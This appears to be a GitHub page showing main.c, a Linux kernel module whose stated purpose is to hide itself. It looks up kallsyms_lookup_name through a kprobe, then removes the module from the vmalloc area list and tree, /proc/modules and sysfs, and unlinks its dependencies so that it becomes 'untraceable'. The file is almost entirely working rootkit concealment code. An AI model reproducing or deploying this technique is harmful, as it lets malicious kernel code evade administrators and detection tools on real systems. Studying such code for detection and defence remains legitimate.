-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmain.c
More file actions
78 lines (65 loc) · 2.13 KB
/
main.c
File metadata and controls
78 lines (65 loc) · 2.13 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#include <linux/kallsyms.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
#if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 7, 0)
#define KPROBE_LOOKUP 1
#include <linux/kprobes.h>
static struct kprobe kp = {
.symbol_name = "kallsyms_lookup_name",
};
#endif
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Het Joshi");
MODULE_DESCRIPTION("A sneaky LKM that hides it self");
static void __init hide_myself(void)
{
struct vmap_area *va, *vtmp;
struct module_use *use, *tmp;
struct list_head *_vmap_area_list;
struct rb_root *_vmap_area_root;
#ifdef KPROBE_LOOKUP
unsigned long (*kallsyms_lookup_name)(const char *name);
if (register_kprobe(&kp) < 0)
return;
kallsyms_lookup_name = (unsigned long (*)(const char *name)) kp.addr;
unregister_kprobe(&kp);
#endif
_vmap_area_list =
(struct list_head *) kallsyms_lookup_name("vmap_area_list");
_vmap_area_root = (struct rb_root *) kallsyms_lookup_name("vmap_area_root");
/* hidden from /proc/vmallocinfo */
list_for_each_entry_safe (va, vtmp, _vmap_area_list, list) {
if ((unsigned long) THIS_MODULE > va->va_start &&
(unsigned long) THIS_MODULE < va->va_end) {
list_del(&va->list);
/* remove from red-black tree */
rb_erase(&va->rb_node, _vmap_area_root);
}
}
/* hidden from /proc/modules */
list_del_init(&THIS_MODULE->list);
/* hidden from /sys/modules */
kobject_del(&THIS_MODULE->mkobj.kobj);
/* decouple the dependency */
list_for_each_entry_safe (use, tmp, &THIS_MODULE->target_list,
target_list) {
list_del(&use->source_list);
list_del(&use->target_list);
sysfs_remove_link(use->target->holders_dir, THIS_MODULE->name);
kfree(use);
}
}
static int __init hide_init(void)
{
hide_myself();
printk("The hidden module is now loaded and untraceable!\n");
printk("This: %p \n", THIS_MODULE); /* TODO: remove this line */
return 0;
}
static void __exit hide_exit(void) {
printk("Dhanywad!");
}
module_init(hide_init);
module_exit(hide_exit);